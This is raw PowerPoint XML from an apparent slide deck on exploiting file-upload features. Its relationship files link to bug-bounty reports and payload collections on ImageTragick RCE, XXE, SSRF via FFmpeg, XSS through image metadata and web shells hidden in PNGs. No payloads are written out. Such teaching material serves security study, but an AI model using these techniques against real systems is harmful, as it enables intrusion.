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</p:sldIdLst>
  <p:sldSz cy="5143500" cx="9144000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Lato"/>
      <p:regular r:id="rId64"/>
      <p:bold r:id="rId65"/>
      <p:italic r:id="rId66"/>
      <p:boldItalic r:id="rId67"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Code Pro"/>
      <p:regular r:id="rId68"/>
      <p:bold r:id="rId69"/>
      <p:italic r:id="rId70"/>
      <p:boldItalic r:id="rId71"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Black"/>
      <p:regular r:id="rId72"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Oswald"/>
      <p:regular r:id="rId73"/>
      <p:bold r:id="rId7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Oswald-regular.fntdata"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ArialBlack-regular.fntdata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74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-bold.fntdata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font" Target="fonts/SourceCodePro-boldItalic.fntdata"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-italic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font" Target="fonts/Lato-regular.fntdata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font" Target="fonts/Lato-italic.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-bold.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-regular.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-boldItalic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SourceCodePro-bold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2ef157b83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2ef157b83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adb43e65b8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adb43e65b8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a35cb4a076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a35cb4a07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adb43e65b8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adb43e65b8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adb43e65b8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adb43e65b8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b80cbaa94f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b80cbaa94f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adb43e65b8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adb43e65b8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dc4522267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dc4522267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a35cb4a07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a35cb4a07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a35cb4a07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a35cb4a07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a35cb4a07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a35cb4a07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db43e65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adb43e65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a35cb4a07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a35cb4a07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a35cb4a07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a35cb4a07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adc45222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adc45222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adc452226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adc452226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adc452226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adc452226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db43e65b8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db43e65b8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a782c9c31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a782c9c31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af2d2dfe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af2d2dfe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b80cbaa94f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b80cbaa94f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b80cbaa94f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b80cbaa94f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afc135aa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afc135aa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af103d28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af103d28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af103d287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af103d287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af103d287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af103d287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af103d287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af103d287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af2d2dfef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af2d2dfef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af2d2dfef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af2d2dfef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af2d2dfef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af2d2dfef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af2d2dfef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af2d2dfef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a7b9f435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a7b9f435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a7b9f435e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a7b9f435e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b80cbaa9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b80cbaa9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af2d2dfef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af2d2dfef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aebdb2a1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aebdb2a1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aebdb2a1a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aebdb2a1a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b80cbaa94f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b80cbaa94f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a58a8bce3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a58a8bce3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a58a8bce3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a58a8bce3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a782c9c31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a782c9c31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a782c9c31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a782c9c31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adc4522267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adc4522267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adc452226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adc452226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adc4522267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adc4522267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adc452226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adc452226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a782c9c31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a782c9c31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ae8b347fd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ae8b347fd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ae8b347fd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ae8b347fd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b80cbaa94f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b80cbaa94f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a35cb4a076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a35cb4a076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e2c5e431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e2c5e431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a2ef157b8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a2ef157b8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a35cb4a07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a35cb4a07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adc4522267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adc4522267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a35cb4a07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a35cb4a07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a35cb4a076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a35cb4a076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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699007" y="-20954"/>
            <a:ext cx="77460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909319" y="-20954"/>
            <a:ext cx="73254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457200" y="1202246"/>
            <a:ext cx="8229600" cy="12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1" i="0" sz="2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idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7165205" y="5009234"/>
            <a:ext cx="16788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7" name="Google Shape;117;p2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8" name="Google Shape;118;p27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OBJECT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8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">
  <p:cSld name="OBJECT_2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3">
  <p:cSld name="OBJECT_3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3" name="Google Shape;133;p30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0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0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0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4">
  <p:cSld name="OBJECT_4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9" name="Google Shape;139;p31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1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1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1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5">
  <p:cSld name="OBJECT_5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5" name="Google Shape;145;p32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2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2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2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6">
  <p:cSld name="OBJECT_6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1" name="Google Shape;151;p33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3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7">
  <p:cSld name="OBJECT_7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7" name="Google Shape;157;p34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4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8">
  <p:cSld name="OBJECT_8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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1678972" y="720740"/>
            <a:ext cx="57861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3" name="Google Shape;163;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736094" y="822578"/>
            <a:ext cx="7139100" cy="24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rgbClr val="115F8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65" name="Google Shape;165;p3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66" name="Google Shape;166;p35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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4487417" y="390906"/>
            <a:ext cx="169200" cy="87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69" name="Google Shape;169;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="791528"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1055370" w="12192000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="1054799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1054799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EBF0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0" name="Google Shape;170;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="809028"/>
            <a:ext cx="9144000" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000"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noFill/>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:srgbClr val="EBF0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1" name="Google Shape;171;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5123853"/>
            <a:ext cx="9144000" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000"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noFill/>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:srgbClr val="EBF0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2" name="Google Shape;172;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1678972" y="720740"/>
            <a:ext cx="57861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3" name="Google Shape;173;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251022" y="925449"/>
            <a:ext cx="3716100" cy="3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rgbClr val="115F8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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4709160" y="1183005"/>
            <a:ext cx="39774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6" name="Google Shape;176;p3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7" name="Google Shape;177;p36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9">
  <p:cSld name="OBJECT_9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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1678972" y="720740"/>
            <a:ext cx="57861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0" name="Google Shape;180;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736094" y="822578"/>
            <a:ext cx="7139100" cy="24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rgbClr val="115F8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3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2" name="Google Shape;182;p3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3" name="Google Shape;183;p37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OBJECT_10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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="526541" y="2795835"/>
            <a:ext cx="8091000" cy="11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4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6" name="Google Shape;186;p3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7" name="Google Shape;187;p3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8" name="Google Shape;188;p38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 Slide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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688847" y="473259"/>
            <a:ext cx="77664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1" name="Google Shape;191;p39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93" name="Google Shape;193;p3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94" name="Google Shape;194;p39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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/0xAwali" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId7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hyperlink" Target="https://anotherhackerblog.com/exploiting-file-uploads-pt1/" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://hackerone.com/reports/764434?fbclid=IwAR0OA_1GmN75s6ckMEguvZvRx9oEPF_ukgoWP6WxcrseDuuEdmHmzACZ50g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hyperlink" Target="https://anotherhackerblog.com/exploiting-file-uploads-pt-2/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://websecblog.com/vulns/googleplex-com-blind-xss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hyperlink" Target="https://hackerone.com/reports/97672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hyperlink" Target="https://twitter.com/intigriti/status/1371454019533692930" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/135072" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/412021" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://imagetragick.com/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/39767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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/403417" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/422944" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/402362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hyperlink" Target="https://ruxcon.org.au/assets/2017/slides/hong-ps-and-gs-ruxcon2017.pdf" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://ruxcon.org.au/assets/2017/slides/hong-ps-and-gs-ruxcon2017.pdf" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://ruxcon.org.au/assets/2017/slides/hong-ps-and-gs-ruxcon2017.pdf" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://zeronights.ru/wp-content/themes/zeronights-2019/public/materials/4_ZN2019_Morozov_SSRF.pdf" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://ruxcon.org.au/assets/2017/slides/hong-ps-and-gs-ruxcon2017.pdf" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ruxcon.org.au/assets/2017/slides/hong-ps-and-gs-ruxcon2017.pdf" TargetMode="External"/><Relationship Id="rId5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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/115857" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/115978" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/237381" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@valeriyshevchenko/ssrf-vulnerability-via-ffmpeg-hls-processing-f3823c16f3c7" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS" TargetMode="External"/><Relationship Id="rId12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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/232614" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/500515" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jonathanbouman/xxe-at-bol-com-7d331186de54" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@valeriyshevchenko/my-first-xml-external-entity-xxe-attack-with-gpx-file-5ca78da9ae98" TargetMode="External"/><Relationship Id="rId10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hyperlink" Target="https://hackerone.com/reports/232174" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kunalkhubchandani.medium.com/how-i-was-rewarded-a-1000-bounty-after-abusing-file-upload-functionality-to-stored-xss-945a40ac6f94" TargetMode="External"/><Relationship Id="rId7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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://f4d3.io/xxe_wild/" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://whitton.io/articles/xss-on-facebook-via-png-content-types/" TargetMode="External"/><Relationship Id="rId7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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20PHP" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/0xinfection/status/1340758820042256384" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hxzeroone/status/1250342399068352512" TargetMode="External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2.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/298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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP" TargetMode="External"/><Relationship Id="rId5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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files#other-extensions" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files#other-extensions" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files#other-extensions" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files#upload-tricks" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files#upload-tricks" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files#upload-tricks" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files#upload-tricks" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/file-upload" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/file-upload" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://twitter.com/intigriti/status/1371454019533692930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1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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files#upload-tricks" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files#upload-tricks" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@d.harish008/what-is-a-magic-byte-and-how-to-exploit-1e286da1c198" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vk9-sec.com/local-file-upload-magic-byte-change-file-type/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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/file-upload" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.synack.com/blog/persistent-xss-via-image-metadata/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/CVE%20ZIP%20Symbolic%20Link" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Busybox%20httpd.conf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Python%20__init__.py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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://speakerdeck.com/filedescriptor/killing-with?slide=14" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.securitum.com/race-condition-attack-exemplary-use-in-web-application/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://a-constant.medium.com/beyond-the-wall-command-injection-still-alive-577a898df0b5" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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hyperlink" Target="https://hackerone.com/reports/298873" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zero.lol/posts/2020-05-09-hey-gucci-you-gucci/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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hyperlink" Target="https://blog.detectify.com/2012/12/30/how-i-hacked-facebook-and-received-a-3500-usd-facebook-bug-bounty/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/93807" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@nahoragg/chaining-tricky-oauth-exploitation-to-stored-xss-b67eaea4aabd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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/302885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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/713" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/s0md3v/status/1210130223334715393" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@dPhoeniixx/vimeo-upload-function-ssrf-7466d8630437" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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s://iplogger.org" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://iplogger.org" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@iframe_h1/a-picture-that-steals-data-ff604ba1012" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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s://github.com/ianare/exif-samples/tree/master/jpg/exif-org" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://exif.regex.info/exif.cgi" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@souravnewatia/exif-geolocation-data-not-stripped-from-uploaded-images-794d20d2fa7d" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ianare/exif-samples/tree/master/jpg/exif-org" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ianare/exif-samples/tree/master/jpg/exif-org" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ianare/exif-samples/tree/master/jpg/exif-org" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/bugbountywriteup/how-i-found-the-facebook-messenger-leaking-access-token-of-million-users-8ee4b3f1e5e3" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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8.jpg"/><Relationship Id="rId4" 